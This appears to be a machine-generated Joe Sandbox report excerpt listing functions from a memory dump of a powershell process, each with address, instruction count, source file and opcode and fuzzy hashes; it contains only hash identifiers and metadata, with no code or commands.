                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 563ddf1b27de4f600de22cd4ca89a5d0433e1e02ab79a6888540fd4bb53e893e
                                                                                                                                                                        • Instruction ID: 218bcdccdca1067c6b0dcefb4d938c5f35b79986ea9c78bedb3c675461a6c3ed
                                                                                                                                                                        • Opcode Fuzzy Hash: 563ddf1b27de4f600de22cd4ca89a5d0433e1e02ab79a6888540fd4bb53e893e
                                                                                                                                                                        • Instruction Fuzzy Hash: 5CD0C935218014AF9744DA88D8818B5FBAAEBD9330324C1ABBC4987381DAB29D129795
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD8A21 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0547a80d869c8fd38a972bf1037b923010fdc1fd404e47d8e5a09560f947cc8c
                                                                                                                                                                        • Instruction ID: e6d5e68bb4c278f5357d6aeda3ffb3f23328788576538e4043426c7e36c2d00b
                                                                                                                                                                        • Opcode Fuzzy Hash: 0547a80d869c8fd38a972bf1037b923010fdc1fd404e47d8e5a09560f947cc8c
                                                                                                                                                                        • Instruction Fuzzy Hash: 17D022304092501FC713C2A0CCA1C86BF318E82108B24C9DEF409DB603CB325807CAA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD934C Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d757c42e91160fcc61af4c6a3f5185217943c3760ceb15f2580a3856074e73b2
                                                                                                                                                                        • Instruction ID: d6a03f41d4ea180f9ee0221149f45417e92100d696eb24a3c7874f0b11988d72
                                                                                                                                                                        • Opcode Fuzzy Hash: d757c42e91160fcc61af4c6a3f5185217943c3760ceb15f2580a3856074e73b2
                                                                                                                                                                        • Instruction Fuzzy Hash: D2D0C7356000146F9714DA94D891CF5B766EBD4364724C15FFC0597301CAB39D53CB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD9348 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 92427850835a80ea3a2015ef3f17cae3f912f2f30f129a2f536bb2ee93e60e00
                                                                                                                                                                        • Instruction ID: 0222d15c9fe682430432dcb726fa495c2019384de1cef09d9324c42b013cccc4
                                                                                                                                                                        • Opcode Fuzzy Hash: 92427850835a80ea3a2015ef3f17cae3f912f2f30f129a2f536bb2ee93e60e00
                                                                                                                                                                        • Instruction Fuzzy Hash: 56D0C935214014AF9744DA88D8418B5BB6AEBD9324324C16BBC5987341CAB29D129790
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD6A08 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 70d285b9606f40eae171b5c59029cbd63accc8b65664278de185a04963f081a6
                                                                                                                                                                        • Instruction ID: 682473ce361797bf9f0a174a7a7812733031353d7087c88542eb75a8b418d231
                                                                                                                                                                        • Opcode Fuzzy Hash: 70d285b9606f40eae171b5c59029cbd63accc8b65664278de185a04963f081a6
                                                                                                                                                                        • Instruction Fuzzy Hash: 10D0C935204018AF9704DA88D841CB6BB6AEBD9320324C05BFD5997740DA72DD53D790
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD6A02 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b1f36a2d71e55264735efb8e4ca585444b9298f07ccdc8a66357571908428c8a
                                                                                                                                                                        • Instruction ID: a2fd21340c2c13f9291b9084bd425ea36f6b435e84e959623300c4dffa6cf2ca
                                                                                                                                                                        • Opcode Fuzzy Hash: b1f36a2d71e55264735efb8e4ca585444b9298f07ccdc8a66357571908428c8a
                                                                                                                                                                        • Instruction Fuzzy Hash: 90D01235604054AF9704DA88D881CB5F7AAEBD8324324C0ABFD4997301EAB3DD13E790
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD9350 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0b476dc9fc3f697ac181155d6f9d98fe1d0e728bda10e3f1de2026883d710f41
                                                                                                                                                                        • Instruction ID: 399b19409b12bfee8db974d66aa2a96c1138129ff0f8d3e3c5f1b8eb92e7f6bb
                                                                                                                                                                        • Opcode Fuzzy Hash: 0b476dc9fc3f697ac181155d6f9d98fe1d0e728bda10e3f1de2026883d710f41
                                                                                                                                                                        • Instruction Fuzzy Hash: A2D012352001187F9704DA88D841CA6F76DEBC9670714C05BFC0887301CAB3ED12C7D0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD9690 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0e1ac2f8e9c90194502c8d95443bf8632022008616cfbeff92fd7ef663bd4fa0
                                                                                                                                                                        • Instruction ID: bd11506c1afb25578efbf56a5cc1c945a41e2ad910c4a82d8dc8389a481208af
                                                                                                                                                                        • Opcode Fuzzy Hash: 0e1ac2f8e9c90194502c8d95443bf8632022008616cfbeff92fd7ef663bd4fa0
                                                                                                                                                                        • Instruction Fuzzy Hash: EEC01230388004EF9308CA98D8918A2F7E29BE9210330C0ABB80EC7300EA73EC039748
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD969D Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: c6d08a6849656dc01d1b51e5cabd53c4047eadcc4a5f8d59968e33fcddc6186e
                                                                                                                                                                        • Instruction ID: 7916a0b9e01699ac67a67f69bad66e079a5f44ee6541701b6fa89a3d2b9ccb27
                                                                                                                                                                        • Opcode Fuzzy Hash: c6d08a6849656dc01d1b51e5cabd53c4047eadcc4a5f8d59968e33fcddc6186e
                                                                                                                                                                        • Instruction Fuzzy Hash: 54C012307000045F9704CA69C891C95BBA1DFD8210310C02DA80DC7301DA72EC03CA40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD9698 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: cfd6a789610b0b7bd9fd9d006d70cfd701b126f154109360c76bace3bf0b4a6b
                                                                                                                                                                        • Instruction ID: 85f5e8a5ae65e887b233061416d0a3a5388602e2a7cfafbc4ab52dbe50e67ec6
                                                                                                                                                                        • Opcode Fuzzy Hash: cfd6a789610b0b7bd9fd9d006d70cfd701b126f154109360c76bace3bf0b4a6b
                                                                                                                                                                        • Instruction Fuzzy Hash: 4DC012303880009F8348CAA8C8A2861B7A69FE8214320C06AA80DC7310EA33EC039640
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDC290 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: dd2786f2b9536679b86c9ea04ac178bd52a2ab56a8a556a7869e9e67a61d3339
                                                                                                                                                                        • Instruction ID: 88a75abf8789d841bd01e4ea39a3aac1546dac96c51cd77274167297e3ca5c3c
                                                                                                                                                                        • Opcode Fuzzy Hash: dd2786f2b9536679b86c9ea04ac178bd52a2ab56a8a556a7869e9e67a61d3339
                                                                                                                                                                        • Instruction Fuzzy Hash: DAC0923028C105CED246C6E8E4A1424FFA29AC8328338C1FBA41ECB309EE639803D588
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD96A0 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                                                                                                        • Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
                                                                                                                                                                        • Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                                                                                                        • Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDC298 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f40974f1d4b2e0415142b8122da80017e4c63e4cfdebefa0674fac1145a25382
                                                                                                                                                                        • Instruction ID: d3b6f3e530d3a75ebff6ceb90708277e88d08ba53a25dad503a73e81ad25eaac
                                                                                                                                                                        • Opcode Fuzzy Hash: f40974f1d4b2e0415142b8122da80017e4c63e4cfdebefa0674fac1145a25382
                                                                                                                                                                        • Instruction Fuzzy Hash: 23B0923024C0008ED246C6C8E992864FBA69A88318328C0BAA44DCB345DF2398038594
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDC29C Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f137ebe4a6e30133424f57014c4e714dcbdf622ef33bb65bee98c74ffc8af2d5
                                                                                                                                                                        • Instruction ID: 0d10e2c2827ced766549bdf647153280eb9ec51715e0556ac2b983538d2149cf
                                                                                                                                                                        • Opcode Fuzzy Hash: f137ebe4a6e30133424f57014c4e714dcbdf622ef33bb65bee98c74ffc8af2d5
                                                                                                                                                                        • Instruction Fuzzy Hash: E2B092306044049FD755CAA9E8D2898BB62EBC4218724C1ADA80DCB706CF73A803CA80
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDAAEE Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0f15325051293fbb91eb75ba4b8f2dc0ccbe7a2421a300b1184edf8fa983d89b
                                                                                                                                                                        • Instruction ID: 0d10e2c2827ced766549bdf647153280eb9ec51715e0556ac2b983538d2149cf
                                                                                                                                                                        • Opcode Fuzzy Hash: 0f15325051293fbb91eb75ba4b8f2dc0ccbe7a2421a300b1184edf8fa983d89b
                                                                                                                                                                        • Instruction Fuzzy Hash: E2B092306044049FD755CAA9E8D2898BB62EBC4218724C1ADA80DCB706CF73A803CA80
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDC2A0 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                                        • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                                                                                                        • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                                        • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD831D Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f9a2db367d5ea0ae23466f40eaa25ba35b626c40c265887df635efc8fd0952a7
                                                                                                                                                                        • Instruction ID: 1735a7ad42db5fa0572bb1013b044ce32ad164084c66599e9df25327fa6a4d99
                                                                                                                                                                        • Opcode Fuzzy Hash: f9a2db367d5ea0ae23466f40eaa25ba35b626c40c265887df635efc8fd0952a7
                                                                                                                                                                        • Instruction Fuzzy Hash: 26B092301000049FD650CAA6D8C2898B762EF95228324C19D980DC7602DA33A803CE40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD8318 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 199e2893e5abee0bfe5a6e28dfa1bc35e484e762ace90bb6cb7fc418ad1f27d6
                                                                                                                                                                        • Instruction ID: 47932b4fef2048dec71c69eebcc8c66aaef338bd2b4a4b4846b133ace072ed6a
                                                                                                                                                                        • Opcode Fuzzy Hash: 199e2893e5abee0bfe5a6e28dfa1bc35e484e762ace90bb6cb7fc418ad1f27d6
                                                                                                                                                                        • Instruction Fuzzy Hash: B9B0123010C0009FC504CAD4D881860FB95DF97328374C0DBF40DCB741DA23D803D500
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD8312 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 12627947fba2704536372aa3be8eba77b57736a551de899622d651098ab93ffa
                                                                                                                                                                        • Instruction ID: eed5c76c9bdec205c871205d406fa4e49122c952bff36a367d6cdc6378242605
                                                                                                                                                                        • Opcode Fuzzy Hash: 12627947fba2704536372aa3be8eba77b57736a551de899622d651098ab93ffa
                                                                                                                                                                        • Instruction Fuzzy Hash: 4EB09230108040CA8100CA94D881420F7959A94A2A37480DBB40ECB301AA2398039609
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDAAF0 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                                        • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                                                                                                        • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                                        • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD8A30 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                                        • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                                                                                                        • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                                                                                                        • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDA040 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                                                                                                        • Instruction ID: bde584bcc0a20163e1d20aefd562f14664055d751c7398f878511897cdc0a054
                                                                                                                                                                        • Opcode Fuzzy Hash: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                                                                                                        • Instruction Fuzzy Hash: DFB012301042084B8100D6C8D841810F39CDB84518314C099980C47302CA23FC038580
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD8320 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                                                                                                        • Instruction ID: bde584bcc0a20163e1d20aefd562f14664055d751c7398f878511897cdc0a054
                                                                                                                                                                        • Opcode Fuzzy Hash: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                                                                                                        • Instruction Fuzzy Hash: DFB012301042084B8100D6C8D841810F39CDB84518314C099980C47302CA23FC038580
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD6143 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 6828d415665d838e7ff2fa1f7eefd61c5a96b2aad1ae1e223b5dc11957d5a6f1
                                                                                                                                                                        • Instruction ID: a7398b0c988767919c093e39f67095139735d7f438de3f707c71421ffca3ef21
                                                                                                                                                                        • Opcode Fuzzy Hash: 6828d415665d838e7ff2fa1f7eefd61c5a96b2aad1ae1e223b5dc11957d5a6f1
                                                                                                                                                                        • Instruction Fuzzy Hash: C5B002356440145B9645D694E551414B755DBC5218314C49DA41DCB655CB33D9138544
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%